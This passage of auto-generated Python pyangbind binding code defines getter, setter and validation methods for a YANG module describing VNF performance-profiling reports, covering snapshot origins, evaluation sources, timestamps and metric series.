load=False): """ Setter method for host, mapped from YANG variable /reports/snapshots/origin/host (string) If this variable is read-only (config: false) in the source YANG file, then _set_host is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_host() directly. YANG Description: The hostname where the source of the snapshot was placed. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="host", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """host must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="host", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__host = t if hasattr(self, '_set'): self._set() def _unset_host(self): self.__host = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="host", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) id = __builtin__.property(_get_id, _set_id) role = __builtin__.property(_get_role, _set_role) host = __builtin__.property(_get_host, _set_host) _pyangbind_elements = OrderedDict([('id', id), ('role', role), ('host', host), ]) class yc_source_vnf_pp__reports_snapshots_evaluations_source(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module vnf-pp - based on the path /reports/snapshots/evaluations/source. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: The details regarding the source of the evaluation. """ __slots__ = ('_path_helper', '_extmethods', '__id','__name','__type','__version','__call',) _yang_name = 'source' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): self._path_helper = kwargs.get("path_helper", False) extmethods = kwargs.pop("extmethods", None) if extmethods is False: self._extmethods = False elif extmethods is not None and isinstance(extmethods, dict): self._extmethods = extmethods elif hasattr(self, "_parent"): extmethods = getattr(self._parent, "_extmethods", None) self._extmethods = extmethods else: self._extmethods = False self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__name = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__type = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__version = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__call = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="call", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return ['reports', 'snapshots', 'evaluations', 'source'] def _get_id(self): """ Getter method for id, mapped from YANG variable /reports/snapshots/evaluations/source/id (string) YANG Description: The unique identifier of the source of the evaluation, i.e., the prober/listener unique identifier. """ return self.__id def _set_id(self, v, load=False): """ Setter method for id, mapped from YANG variable /reports/snapshots/evaluations/source/id (string) If this variable is read-only (config: false) in the source YANG file, then _set_id is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_id() directly. YANG Description: The unique identifier of the source of the evaluation, i.e., the prober/listener unique identifier. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """id must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__id = t if hasattr(self, '_set'): self._set() def _unset_id(self): self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_name(self): """ Getter method for name, mapped from YANG variable /reports/snapshots/evaluations/source/name (string) YANG Description: The name of the source of the evaluation, i.e., the prober/listener name. """ return self.__name def _set_name(self, v, load=False): """ Setter method for name, mapped from YANG variable /reports/snapshots/evaluations/source/name (string) If this variable is read-only (config: false) in the source YANG file, then _set_name is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_name() directly. YANG Description: The name of the source of the evaluation, i.e., the prober/listener name. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """name must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__name = t if hasattr(self, '_set'): self._set() def _unset_name(self): self.__name = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_type(self): """ Getter method for type, mapped from YANG variable /reports/snapshots/evaluations/source/type (string) YANG Description: The type of the source of the evaluation, i.e., one of prober or listener, that was used to obtain it. """ return self.__type def _set_type(self, v, load=False): """ Setter method for type, mapped from YANG variable /reports/snapshots/evaluations/source/type (string) If this variable is read-only (config: false) in the source YANG file, then _set_type is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_type() directly. YANG Description: The type of the source of the evaluation, i.e., one of prober or listener, that was used to obtain it. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """type must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__type = t if hasattr(self, '_set'): self._set() def _unset_type(self): self.__type = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_version(self): """ Getter method for version, mapped from YANG variable /reports/snapshots/evaluations/source/version (string) YANG Description: The version of the tool interfacing the prober/listener that was used to obtain the evaluation. """ return self.__version def _set_version(self, v, load=False): """ Setter method for version, mapped from YANG variable /reports/snapshots/evaluations/source/version (string) If this variable is read-only (config: false) in the source YANG file, then _set_version is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_version() directly. YANG Description: The version of the tool interfacing the prober/listener that was used to obtain the evaluation. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """version must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__version = t if hasattr(self, '_set'): self._set() def _unset_version(self): self.__version = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_call(self): """ Getter method for call, mapped from YANG variable /reports/snapshots/evaluations/source/call (string) YANG Description: The full call of the tool realized by the source of the evaluation that performed the acquisiton of the metrics. """ return self.__call def _set_call(self, v, load=False): """ Setter method for call, mapped from YANG variable /reports/snapshots/evaluations/source/call (string) If this variable is read-only (config: false) in the source YANG file, then _set_call is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_call() directly. YANG Description: The full call of the tool realized by the source of the evaluation that performed the acquisiton of the metrics. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="call", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """call must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="call", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__call = t if hasattr(self, '_set'): self._set() def _unset_call(self): self.__call = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="call", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) id = __builtin__.property(_get_id, _set_id) name = __builtin__.property(_get_name, _set_name) type = __builtin__.property(_get_type, _set_type) version = __builtin__.property(_get_version, _set_version) call = __builtin__.property(_get_call, _set_call) _pyangbind_elements = OrderedDict([('id', id), ('name', name), ('type', type), ('version', version), ('call', call), ]) class yc_timestamp_vnf_pp__reports_snapshots_evaluations_timestamp(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module vnf-pp - based on the path /reports/snapshots/evaluations/timestamp. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: Timestamps of the procedures that realized the extraction of the evaluation. """ __slots__ = ('_path_helper', '_extmethods', '__start','__stop',) _yang_name = 'timestamp' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): self._path_helper = kwargs.get("path_helper", False) extmethods = kwargs.pop("extmethods", None) if extmethods is False: self._extmethods = False elif extmethods is not None and isinstance(extmethods, dict): self._extmethods = extmethods elif hasattr(self, "_parent"): extmethods = getattr(self._parent, "_extmethods", None) self._extmethods = extmethods else: self._extmethods = False self.__start = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="start", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__stop = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="stop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return ['reports', 'snapshots', 'evaluations', 'timestamp'] def _get_start(self): """ Getter method for start, mapped from YANG variable /reports/snapshots/evaluations/timestamp/start (string) YANG Description: Time (date, hour, minute, second) when the evaluation started """ return self.__start def _set_start(self, v, load=False): """ Setter method for start, mapped from YANG variable /reports/snapshots/evaluations/timestamp/start (string) If this variable is read-only (config: false) in the source YANG file, then _set_start is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_start() directly. YANG Description: Time (date, hour, minute, second) when the evaluation started """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="start", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """start must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="start", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__start = t if hasattr(self, '_set'): self._set() def _unset_start(self): self.__start = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="start", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_stop(self): """ Getter method for stop, mapped from YANG variable /reports/snapshots/evaluations/timestamp/stop (string) YANG Description: Time (date, hour, minute, second) when the evaluation stopped """ return self.__stop def _set_stop(self, v, load=False): """ Setter method for stop, mapped from YANG variable /reports/snapshots/evaluations/timestamp/stop (string) If this variable is read-only (config: false) in the source YANG file, then _set_stop is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_stop() directly. YANG Description: Time (date, hour, minute, second) when the evaluation stopped """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="stop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """stop must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="stop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__stop = t if hasattr(self, '_set'): self._set() def _unset_stop(self): self.__stop = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="stop", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) start = __builtin__.property(_get_start, _set_start) stop = __builtin__.property(_get_stop, _set_stop) _pyangbind_elements = OrderedDict([('start', start), ('stop', stop), ]) class yc_series_vnf_pp__reports_snapshots_evaluations_metrics_series(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module vnf-pp - based on the path /reports/snapshots/evaluations/metrics/series. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: A list of key/values, e.g., a timeseries. """ __slots__ = ('_path_helper', '_extmethods', '__key','__value',) _yang_name = 'series' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): self._path_helper = kwargs.get("path_helper", False) extmethods = kwargs.pop("extmethods", None) if extmethods is False: self._extmethods = False elif extmethods is not None and isinstance(extmethods, dict): self._extmethods = extmethods elif hasattr(self, "_parent"): extmethods = getattr(self._parent, "_extmethods", None) self._extmethods = extmethods else: self._extmethods = False self.__key = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="key", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__value = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="value", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return ['reports', 'snapshots', 'evaluations', 'metrics', 'series'] def _get_key(self): """ Getter method for key, mapped from YANG variable /reports/snapshots/evaluations/metrics/series/key (string) YANG Description: Tuple key. """ return self.__key def _set_key(self, v, load=False): """ Setter method for key, mapped from YANG variable /reports/snapshots/evaluations/metrics/series/key (string) If this variable is read-only (config: false) in the source YANG file, then _set_key is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_key() directly. YANG Description: Tuple key. """ parent = getattr(self, "_parent", None) if parent is not None and load is False: raise AttributeError("Cannot set keys directly when" + " within an instantiated list") if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="key", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """key must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="key", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__key = t if hasattr(self, '_set'): self._set() def _unset_key(self): self.__key = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="key", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_value(self): """ Getter method for value, mapped from YANG variable /reports/snapshots/evaluations/metrics/series/value (string) YANG Description: Tuple value. """ return self.__value def _set_value(self, v, load=False): """ Setter method for value, mapped from YANG variable /reports/snapshots/evaluations/metrics/series/value (string) If this variable is read-only (config: false) in the source YANG file, then _set_value is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_value() directly. YANG Description: Tuple value. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="value", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """value must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="value", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__value = t if hasattr(self, '_set'): self._set() def _unset_value(self): self.__value = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="value", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) key = __builtin__.property(_get_key, _set_key) value = __builtin__.property(_get_value, _set_value) __choices__ = {'value': {'series': ['key', 'value']}} _pyangbind_elements = OrderedDict([('key', key), ('value', value), ]) class yc_metrics_vnf_pp__reports_snapshots_evaluations_metrics(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module vnf-pp - based on the path /reports/snapshots/evaluations/metrics. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: List of metrics obtained from a single evaluation. """ __slots__ = ('_path_helper', '_extmethods', '__name','__unit','__type','__scalar','__series',) _yang_name = 'metrics' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): self._path_helper = kwargs.get("path_helper", False) extmethods = kwargs.pop("extmethods", None) if extmethods is False: self._extmethods = False elif extmethods is not None and isinstance(extmethods, dict): self._extmethods = extmethods elif hasattr(self, "_parent"): extmethods = getattr(self._parent, "_extmethods", None) self._extmethods = extmethods else: self._extmethods = False self.__name = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__unit = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="unit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__type = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__scalar = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="scalar", parent=self, choice=('value', 'scalar'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__series = YANGDynClass(base=YANGListType("key",yc_series_vnf_pp__reports_snapshots_evaluations_metrics_series, yang_name="series", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='key', extensions=None, choice=False), is_container='list', yang_name="series", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return ['reports', 'snapshots', 'evaluations', 'metrics'] def _get_name(self): """ Getter method for name, mapped from YANG variable /reports/snapshots/evaluations/metrics/name (string) YANG Description: The metric name """ return self.__name def _set_name(self, v, load=False): """ Setter method for name, mapped from YANG variable /reports/snapshots/evaluations/metrics/name (string) If this variable is read-only (config: false) in the source YANG file, then _set_name is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_name() directly. YANG Description: The metric name """ parent = getattr(self, "_parent", None) if parent is not None and load is False: raise AttributeError("Cannot set keys directly when" + " within an instantiated list") if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """name must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__name = t if hasattr(self, '_set'): self._set() def _unset_name(self): self.__name = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_unit(self): """ Getter method for unit, mapped from YANG variable /reports/snapshots/evaluations/metrics/unit (string) YANG Description: The unit of the metric value(s). """ return self.__unit def _set_unit(self, v, load=False): """ Setter method for unit, mapped from YANG variable /reports/snapshots/evaluations/metrics/unit (string) If this variable is read-only (config: false) in the source YANG file, then _set_unit is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_unit() directly. YANG Description: The unit of the metric value(s). """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="unit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """unit must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="unit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__unit = t if hasattr(self, '_set'): self._set() def _unset_unit(self): self.__unit = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="unit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_type(self): """ Getter method for type, mapped from YANG variable /reports/snapshots/evaluations/metrics/type (string) YANG Description: The data type encoded in the value. It must refer to a known variable type, i.e., string, float, uint, etc. """ return self.__type def _set_type(self, v, load=False): """ Setter method for type, mapped from YANG variable /reports/snapshots/evaluations/metrics/type (string) If this variable is read-only (config: false) in the source YANG file, then _set_type is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_type() directly. YANG Description: The data type encoded in the value. It must refer to a known variable type, i.e., string, float, uint, etc. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """type must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__type = t if hasattr(self, '_set'): self._set() def _unset_type(self): self.__type = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_scalar(self): """ Getter method for scalar, mapped from YANG variable /reports/snapshots/evaluations/metrics/scalar (string) YANG Description: A single scalar value. """ return self.__scalar def _set_scalar(self, v, load=False): """ Setter method for scalar, mapped from YANG variable /reports/snapshots/evaluations/metrics/scalar (string) If this variable is read-only (config: false) in the source YANG file, then _set_scalar is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_scalar() directly. YANG Description: A single scalar value. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="scalar", parent=self, choice=('value', 'scalar'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """scalar must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="scalar", parent=self, choice=('value', 'scalar'), 